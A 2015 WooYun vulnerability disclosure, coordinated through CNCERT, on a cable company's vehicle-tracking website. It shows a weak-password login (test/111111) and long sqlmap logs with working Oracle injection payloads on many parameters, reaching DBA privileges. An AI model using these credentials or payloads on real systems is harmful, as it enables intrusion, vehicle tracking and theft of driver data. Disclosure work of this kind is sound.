
Vulnerability summary

Defect ID: wooyun-2015-0142312

Title: Gehua Cable vehicle-tracking system has a weak password and multiple SQL injections, bundled (hundreds of vehicles can be monitored + user information + DBA privileges)

Related vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-09-22 09:51

Fixed: 2015-11-08 15:58

Published: 2015-11-08 15:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-22: Details sent to the vendor, awaiting vendor handling
2015-09-24: Vendor has confirmed; details disclosed to the vendor only
2015-10-04: Details disclosed to core white hats and experts in the relevant field
2015-10-14: Details disclosed to regular white hats
2015-10-24: Details disclosed to intern white hats
2015-11-08: Details disclosed to the public

Brief description:

I had assumed the login-form injection had been fixed and could no longer be injected; I did not expect a weak password to start a whole SQL injection journey!

Detailed description:

PS:
After submitting this report, I found that the weak-password user's password had been changed!
The injection points reachable after logging in are still there, though!
1. Weak-password login

**.**.**.**/


test 111111 (username test, password 111111)
2. Injection via the cookie
After logging in with the test account, refresh the page and capture the request: the cookie is injectable, in the company_id parameter.
--dbms "Oracle"
This apparently can only be tested while logged in; when testing from the login form, the parameter in the cookie could not be injected.
The sqlmap results are shown below: DBA privileges.
And the passwords there are all weak ones too; I won't say more here, administrators should check for themselves!
There are other databases as well; I stopped testing there, enough said!

[Screenshots 1.jpg to 6.jpg: sqlmap results]


3. GET injection
Still the company_id parameter, again obtained by refreshing the page and capturing the request!

**.**.**.**/motor_api/motor_ajax_baidu_latlng.php?company_id=1970 (POST)
rand=0.3906304221848003


[23:07:17] [INFO] heuristic (basic) test shows that GET parameter 'company_id' m
ight be injectable (possible DBMS: 'Oracle')
[23:07:17] [INFO] testing for SQL injection on GET parameter 'company_id'
[23:07:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:07:18] [WARNING] reflective value(s) found and filtering out
[23:07:28] [INFO] GET parameter 'company_id' seems to be 'AND boolean-based blin
d - WHERE or HAVING clause' injectable
[23:07:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:07:28] [INFO] GET parameter 'company_id' is 'Oracle AND error-based - WHERE
or HAVING clause (XMLType)' injectable
[23:07:28] [INFO] testing 'Oracle inline queries'
[23:07:28] [INFO] testing 'Oracle AND time-based blind'
[23:07:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:07:33] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[23:07:34] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[23:07:35] [INFO] target URL appears to have 4 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
GET parameter 'company_id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
sqlmap identified the following injection points with a total of 68 HTTP(s) requ
ests:
---
Place: GET
Parameter: company_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: company_id=1970' AND 7340=7340 AND 'qZZA'='qZZA
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: company_id=1970' AND 4090=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||C
HR(113)||CHR(122)||CHR(117)||CHR(103)||CHR(113)||(SELECT (CASE WHEN (4090=4090)
THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(118)||CHR(114)||CHR(113)|
|CHR(62))) FROM DUAL) AND 'ZTrA'='ZTrA
---
[23:07:54] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:08:26] [INFO] fetching current user
[23:08:27] [WARNING] reflective value(s) found and filtering out
[23:08:27] [INFO] retrieved: SHMOTO
current user: 'SHMOTO'
[23:08:27] [INFO] fetching current database
[23:08:27] [INFO] resumed: SHMOTO
[23:08:27] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SHMOTO'
[23:08:27] [INFO] testing if current user is DBA
current user is DBA: True


4. Injection point three:
Look at the captured requests.
Under "Vehicle basic information":
Vehicle list:

**.**.**.**/device_list_text.php?chepaihao=1&driver=2&company_level=1970&sub1=%E6%9F%A5%E8%AF%A2&cck%5B%5D=TCD_CAR_NUMBER&cck%5B%5D=TCD_CAR_MODEL&cck%5B%5D=TCD_DRIVER&cck%5B%5D=TCD_DRIVER_MOBILE&cck%5B%5D=TCD_BUYCARTIME&cck%5B%5D=TCD_INSUREENDTIME&cck%5B%5D=TCD_CHEWEIINFO&cck%5B%5D=TCD_CAR_TYPE&cck%5B%5D=TCI_COMPANY_NAME&cck%5B%5D=TCH_BIAOSHI&cck%5B%5D=DISTRICT_NUM&cck%5B%5D=TIME&cck%5B%5D=IMEI&cck%5B%5D=SIM


chepaihao and driver are both injectable
Vehicle-return management (the test account has no permission here)
Vehicle maintenance:

**.**.**.**/alarm_baoyang.php?chepaihao=1&driver=2&company_level=1970&sub1=%E6%9F%A5%E8%AF%A2


chepaihao and driver are both injectable

sqlmap identified the following injection points with a total of 393 HTTP(s) req
uests:
---
Place: GET
Parameter: chepaihao
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: chepaihao=1%' AND 1446=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(
113)||CHR(105)||CHR(111)||CHR(103)||CHR(113)||(SELECT (CASE WHEN (1446=1446) THE
N 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(119)||CHR(115)||CHR(113)||CH
R(62))) FROM DUAL) AND '%'='&driver=2&company_level=1970&sub1=%E6%9F%A5%E8%AF%A2
&cck[]=TCD_CAR_NUMBER&cck[]=TCD_CAR_MODEL&cck[]=TCD_DRIVER&cck[]=TCD_DRIVER_MOBI
LE&cck[]=TCD_BUYCARTIME&cck[]=TCD_INSUREENDTIME&cck[]=TCD_CHEWEIINFO&cck[]=TCD_C
AR_TYPE&cck[]=TCI_COMPANY_NAME&cck[]=TCH_BIAOSHI&cck[]=DISTRICT_NUM&cck[]=TIME&c
ck[]=IMEI&cck[]=SIM
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: chepaihao=1%' AND 7948=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(104)|
|CHR(116)||CHR(109),5) AND '%'='&driver=2&company_level=1970&sub1=%E6%9F%A5%E8%A
F%A2&cck[]=TCD_CAR_NUMBER&cck[]=TCD_CAR_MODEL&cck[]=TCD_DRIVER&cck[]=TCD_DRIVER_
MOBILE&cck[]=TCD_BUYCARTIME&cck[]=TCD_INSUREENDTIME&cck[]=TCD_CHEWEIINFO&cck[]=T
CD_CAR_TYPE&cck[]=TCI_COMPANY_NAME&cck[]=TCH_BIAOSHI&cck[]=DISTRICT_NUM&cck[]=TI
ME&cck[]=IMEI&cck[]=SIM
Place: GET
Parameter: driver
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: chepaihao=1&driver=2%' AND 7689=(SELECT UPPER(XMLType(CHR(60)||CHR(
58)||CHR(113)||CHR(105)||CHR(111)||CHR(103)||CHR(113)||(SELECT (CASE WHEN (7689=
7689) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(119)||CHR(115)||CHR
(113)||CHR(62))) FROM DUAL) AND '%'='&company_level=1970&sub1=%E6%9F%A5%E8%AF%A2
&cck[]=TCD_CAR_NUMBER&cck[]=TCD_CAR_MODEL&cck[]=TCD_DRIVER&cck[]=TCD_DRIVER_MOBI
LE&cck[]=TCD_BUYCARTIME&cck[]=TCD_INSUREENDTIME&cck[]=TCD_CHEWEIINFO&cck[]=TCD_C
AR_TYPE&cck[]=TCI_COMPANY_NAME&cck[]=TCH_BIAOSHI&cck[]=DISTRICT_NUM&cck[]=TIME&c
ck[]=IMEI&cck[]=SIM
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: chepaihao=1&driver=2%' AND 6850=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)|
|CHR(107)||CHR(109)||CHR(82),5) AND '%'='&company_level=1970&sub1=%E6%9F%A5%E8%A
F%A2&cck[]=TCD_CAR_NUMBER&cck[]=TCD_CAR_MODEL&cck[]=TCD_DRIVER&cck[]=TCD_DRIVER_
MOBILE&cck[]=TCD_BUYCARTIME&cck[]=TCD_INSUREENDTIME&cck[]=TCD_CHEWEIINFO&cck[]=T
CD_CAR_TYPE&cck[]=TCI_COMPANY_NAME&cck[]=TCH_BIAOSHI&cck[]=DISTRICT_NUM&cck[]=TI
ME&cck[]=IMEI&cck[]=SIM
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: chepaihao, type: Single quoted string (default)
[1] place: GET, parameter: driver, type: Single quoted string
[q] Quit
> 0
[23:42:24] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:42:24] [INFO] fetching current user
[23:42:25] [INFO] retrieved: SHMOTO
current user: 'SHMOTO'
[23:42:25] [INFO] fetching current database
[23:42:25] [INFO] resumed: SHMOTO
[23:42:25] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SHMOTO'
[23:42:25] [INFO] testing if current user is DBA
current user is DBA: True


5. Injection point four:
Under "Alarm data":
Speeding alarm:

**.**.**.**/alarm_speed.php?chepaihao=1&driver=2&starttime=2015-09-01&endtime=2015-09-03&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck%5B%5D=TCD_CAR_NUMBER&cck%5B%5D=CREATETIME&cck%5B%5D=SPEED&cck%5B%5D=TCD_SPEED_SETTING&cck%5B%5D=TCI_COMPANY_NAME&cck%5B%5D=TCD_DRIVER&cck%5B%5D=TCD_DRIVER_MOBILE


Geofence (out-of-range) alarm:

**.**.**.**/alarm_range.php?driver=1&starttime=2015-09-02&endtime=2015-09-02&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2&cck%5B%5D=TCD_CAR_NUMBER&cck%5B%5D=CREATETIME&cck%5B%5D=FORB_CONTENT&cck%5B%5D=TCI_COMPANY_NAME&cck%5B%5D=TCD_DRIVER&cck%5B%5D=TCD_DRIVER_MOBILE


Vehicle-return alarm:

**.**.**.**/alarm_stop.php?chepaihao=1&driver=2&starttime=2015-09-16&endtime=2015-09-17&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck%5B%5D=TCD_CAR_NUMBER&cck%5B%5D=CREATETIME&cck%5B%5D=TCI_COMPANY_NAME&cck%5B%5D=TCD_DRIVER&cck%5B%5D=TCD_DRIVER_MOBILE&cck%5B%5D=TCH_BIAOSHI&cck%5B%5D=FORB_CONTENT


chepaihao, driver, starttime, endtime and company_id are all injectable

[23:46:55] [INFO] target URL is stable
[23:46:55] [INFO] testing if GET parameter 'chepaihao' is dynamic
[23:46:55] [WARNING] GET parameter 'chepaihao' does not appear dynamic
[23:46:55] [INFO] heuristic (basic) test shows that GET parameter 'chepaihao' mi
ght be injectable (possible DBMS: 'Oracle')
[23:46:55] [INFO] testing for SQL injection on GET parameter 'chepaihao'
[23:46:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:46:56] [WARNING] reflective value(s) found and filtering out
[23:47:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:47:07] [INFO] GET parameter 'chepaihao' is 'Oracle AND error-based - WHERE o
r HAVING clause (XMLType)' injectable
[23:47:07] [INFO] testing 'Oracle inline queries'
[23:47:07] [INFO] testing 'Oracle AND time-based blind'
[23:47:07] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[23:47:28] [INFO] GET parameter 'chepaihao' seems to be 'Oracle AND time-based b
lind' injectable
[23:47:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:47:28] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[23:47:41] [INFO] target URL appears to be UNION injectable with 1 columns
GET parameter 'chepaihao' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[23:47:45] [INFO] testing if GET parameter 'driver' is dynamic
[23:47:46] [WARNING] GET parameter 'driver' does not appear dynamic
[23:47:46] [INFO] heuristic (basic) test shows that GET parameter 'driver' might
be injectable (possible DBMS: 'Oracle')
[23:47:46] [INFO] testing for SQL injection on GET parameter 'driver'
[23:47:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:47:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:47:58] [INFO] GET parameter 'driver' is 'Oracle AND error-based - WHERE or H
AVING clause (XMLType)' injectable
[23:47:58] [INFO] testing 'Oracle inline queries'
[23:47:58] [INFO] testing 'Oracle AND time-based blind'
[23:48:18] [INFO] GET parameter 'driver' seems to be 'Oracle AND time-based blin
d' injectable
[23:48:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'driver' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
[23:48:31] [INFO] testing if GET parameter 'starttime' is dynamic
[23:48:32] [WARNING] GET parameter 'starttime' does not appear dynamic
[23:48:32] [INFO] heuristic (basic) test shows that GET parameter 'starttime' mi
ght be injectable (possible DBMS: 'Oracle')
[23:48:32] [INFO] testing for SQL injection on GET parameter 'starttime'
[23:48:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:48:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:48:37] [INFO] GET parameter 'starttime' is 'Oracle AND error-based - WHERE o
r HAVING clause (XMLType)' injectable
[23:48:37] [INFO] testing 'Oracle inline queries'
[23:48:37] [INFO] testing 'Oracle AND time-based blind'
[23:48:58] [INFO] GET parameter 'starttime' seems to be 'Oracle AND time-based b
lind' injectable
[23:48:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'starttime' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[23:49:06] [INFO] testing if GET parameter 'endtime' is dynamic
[23:49:06] [WARNING] GET parameter 'endtime' does not appear dynamic
[23:49:06] [INFO] heuristic (basic) test shows that GET parameter 'endtime' migh
t be injectable (possible DBMS: 'Oracle')
[23:49:06] [INFO] testing for SQL injection on GET parameter 'endtime'
[23:49:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:49:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:49:11] [INFO] GET parameter 'endtime' is 'Oracle AND error-based - WHERE or
HAVING clause (XMLType)' injectable
[23:49:11] [INFO] testing 'Oracle inline queries'
[23:49:11] [INFO] testing 'Oracle AND time-based blind'
[23:49:31] [INFO] GET parameter 'endtime' seems to be 'Oracle AND time-based bli
nd' injectable
[23:49:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'endtime' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] y
[23:49:40] [INFO] testing if GET parameter 'company_id' is dynamic
[23:49:40] [WARNING] GET parameter 'company_id' does not appear dynamic
[23:49:40] [INFO] heuristic (basic) test shows that GET parameter 'company_id' m
ight be injectable (possible DBMS: 'Oracle')
[23:49:40] [INFO] testing for SQL injection on GET parameter 'company_id'
[23:49:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:49:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:49:49] [INFO] testing 'Oracle inline queries'
[23:49:49] [INFO] testing 'Oracle AND time-based blind'
[23:50:09] [INFO] GET parameter 'company_id' seems to be 'Oracle AND time-based
blind' injectable
[23:50:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:50:16] [INFO] checking if the injection point on GET parameter 'company_id'
is a false positive
GET parameter 'company_id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 252 HTTP(s) req
uests:
---
Place: GET
Parameter: company_id
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: chepaihao=1&driver=2&starttime=2015-09-01&endtime=2015-09-03&compan
y_id=1970' AND 1087=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(114)||CHR(116)||CHR(
84),5) AND 'lOTO'='lOTO&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREAT
ETIME&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVE
R&cck[]=TCD_DRIVER_MOBILE
Place: GET
Parameter: chepaihao
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: chepaihao=1%' AND 9200=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(
113)||CHR(112)||CHR(109)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (9200=9200) THE
N 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(103)||CHR(117)||CHR(101)||CHR(113)||CH
R(62))) FROM DUAL) AND '%'='&driver=2&starttime=2015-09-01&endtime=2015-09-03&co
mpany_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIME&cck[
]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cck[]=TC
D_DRIVER_MOBILE
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: chepaihao=1%' AND 6894=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(105)|
|CHR(104)||CHR(108),5) AND '%'='&driver=2&starttime=2015-09-01&endtime=2015-09-0
3&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIME&
cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cck[
]=TCD_DRIVER_MOBILE
Place: GET
Parameter: endtime
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: chepaihao=1&driver=2&starttime=2015-09-01&endtime=2015-09-03' AND 8
276=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(109)||CHR(11
6)||CHR(113)||(SELECT (CASE WHEN (8276=8276) THEN 1 ELSE 0 END) FROM DUAL)||CHR(
113)||CHR(103)||CHR(117)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND 'PVWP'='P
VWP&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIM
E&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cc
k[]=TCD_DRIVER_MOBILE
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: chepaihao=1&driver=2&starttime=2015-09-01&endtime=2015-09-03' AND 1
480=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(118)||CHR(111)||CHR(98),5) AND 'Mwlh
'='Mwlh&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREAT
ETIME&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVE
R&cck[]=TCD_DRIVER_MOBILE
Place: GET
Parameter: starttime
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: chepaihao=1&driver=2&starttime=2015-09-01' AND 8085=(SELECT UPPER(X
MLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(109)||CHR(116)||CHR(113)||(SELE
CT (CASE WHEN (8085=8085) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(103)||CHR
(117)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND 'vVdE'='vVdE&endtime=2015-09
-03&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIM
E&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cc
k[]=TCD_DRIVER_MOBILE
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: chepaihao=1&driver=2&starttime=2015-09-01' AND 7943=DBMS_PIPE.RECEI
VE_MESSAGE(CHR(114)||CHR(114)||CHR(81)||CHR(83),5) AND 'qKtt'='qKtt&endtime=2015
-09-03&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATE
TIME&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER
&cck[]=TCD_DRIVER_MOBILE
Place: GET
Parameter: driver
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: chepaihao=1&driver=2%' AND 7040=(SELECT UPPER(XMLType(CHR(60)||CHR(
58)||CHR(113)||CHR(112)||CHR(109)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (7040=
7040) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(103)||CHR(117)||CHR(101)||CHR
(113)||CHR(62))) FROM DUAL) AND '%'='&starttime=2015-09-01&endtime=2015-09-03&co
mpany_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIME&cck[
]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cck[]=TC
D_DRIVER_MOBILE
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: chepaihao=1&driver=2%' AND 9809=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)|
|CHR(109)||CHR(84)||CHR(107),5) AND '%'='&starttime=2015-09-01&endtime=2015-09-0
3&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIME&
cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cck[
]=TCD_DRIVER_MOBILE
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: chepaihao, type: Single quoted string (default)
[1] place: GET, parameter: driver, type: Single quoted string
[2] place: GET, parameter: starttime, type: Single quoted string
[3] place: GET, parameter: endtime, type: Single quoted string
[4] place: GET, parameter: company_id, type: Single quoted string
[q] Quit
> 0
[23:50:44] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:50:44] [INFO] fetching current user
[23:50:45] [INFO] retrieved: SHMOTO
current user: 'SHMOTO'
[23:50:45] [INFO] fetching current database
[23:50:45] [INFO] resumed: SHMOTO
[23:50:45] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SHMOTO'
[23:50:45] [INFO] testing if current user is DBA
current user is DBA: True


6. Injection point five
Under "Statistical reports":
Vehicle mileage and fuel consumption:

**.**.**.**/tongji_mile_all.php?day1=2015-09-18&day2=2015-09-19&company_id=1970&chepaihao=1&sub1=%E6%90%9C%E7%B4%A2


day1, day2 and chepaihao are injectable

sqlmap identified the following injection points with a total of 217 HTTP(s) req
uests:
---
Place: GET
Parameter: day1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: day1=2015-09-18' AND 9093=9093 AND 'Rlpb'='Rlpb&day2=2015-09-19&com
pany_id=1970&chepaihao=1&sub1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: day1=2015-09-18' AND 1042=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||C
HR(113)||CHR(104)||CHR(99)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1042=1042) T
HEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(103)||CHR(101)||CHR(113)||C
HR(62))) FROM DUAL) AND 'iFGe'='iFGe&day2=2015-09-19&company_id=1970&chepaihao=1
&sub1=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: day1=2015-09-18' AND 4052=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(1
20)||CHR(78)||CHR(78),5) AND 'iOma'='iOma&day2=2015-09-19&company_id=1970&chepai
hao=1&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: chepaihao
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: day1=2015-09-18&day2=2015-09-19&company_id=1970&chepaihao=1%' AND 8
535=8535 AND '%'='&sub1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: day1=2015-09-18&day2=2015-09-19&company_id=1970&chepaihao=1%' AND 4
817=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(104)||CHR(99)||CHR(106
)||CHR(113)||(SELECT (CASE WHEN (4817=4817) THEN 1 ELSE 0 END) FROM DUAL)||CHR(1
13)||CHR(99)||CHR(103)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='&sub1=
%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: day1=2015-09-18&day2=2015-09-19&company_id=1970&chepaihao=1%' AND 2
828=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(77)||CHR(81)||CHR(83),5) AND '%'='&su
b1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: day2
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: day1=2015-09-18&day2=2015-09-19' AND 9339=9339 AND 'FiKs'='FiKs&com
pany_id=1970&chepaihao=1&sub1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: day1=2015-09-18&day2=2015-09-19' AND 1172=(SELECT UPPER(XMLType(CHR
(60)||CHR(58)||CHR(113)||CHR(104)||CHR(99)||CHR(106)||CHR(113)||(SELECT (CASE WH
EN (1172=1172) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(103)||CHR(1
01)||CHR(113)||CHR(62))) FROM DUAL) AND 'DZyH'='DZyH&company_id=1970&chepaihao=1
&sub1=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: day1=2015-09-18&day2=2015-09-19' AND 4542=DBMS_PIPE.RECEIVE_MESSAGE
(CHR(65)||CHR(115)||CHR(105)||CHR(88),5) AND 'akOs'='akOs&company_id=1970&chepai
hao=1&sub1=%E6%90%9C%E7%B4%A2
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: day1, type: Single quoted string (default)
[1] place: GET, parameter: day2, type: Single quoted string
[2] place: GET, parameter: chepaihao, type: Single quoted string
[q] Quit
> 0
[23:55:10] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:55:10] [INFO] fetching current user
[23:55:10] [INFO] retrieved: SHMOTO
current user: 'SHMOTO'
[23:55:10] [INFO] fetching current database
[23:55:10] [INFO] resumed: SHMOTO
[23:55:10] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SHMOTO'
[23:55:10] [INFO] testing if current user is DBA
current user is DBA: True


Grouped mileage and fuel consumption (POST data):

**.**.**.**/tongji_mile.php (POST)
day1=2015-09-18&day2=2015-09-19&sub1=%E6%90%9C%E7%B4%A2


Likewise, day1 and day2 are injectable

sqlmap identified the following injection points with a total of 129 HTTP(s) req
uests:
---
Place: POST
Parameter: day1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: day1=2015-09-18' AND 3214=3214 AND 'gJvU'='gJvU&day2=2015-09-19&sub
1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: day1=2015-09-18' AND 1021=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||C
HR(113)||CHR(113)||CHR(110)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (1021=1021)
THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(121)||CHR(119)||CHR(113)|
|CHR(62))) FROM DUAL) AND 'cZik'='cZik&day2=2015-09-19&sub1=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: day1=2015-09-18' AND 2755=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(10
6)||CHR(74)||CHR(79),5) AND 'PAWt'='PAWt&day2=2015-09-19&sub1=%E6%90%9C%E7%B4%A2
Place: POST
Parameter: day2
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: day1=2015-09-18&day2=2015-09-19' AND 1146=1146 AND 'DACt'='DACt&sub
1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: day1=2015-09-18&day2=2015-09-19' AND 2080=(SELECT UPPER(XMLType(CHR
(60)||CHR(58)||CHR(113)||CHR(113)||CHR(110)||CHR(118)||CHR(113)||(SELECT (CASE W
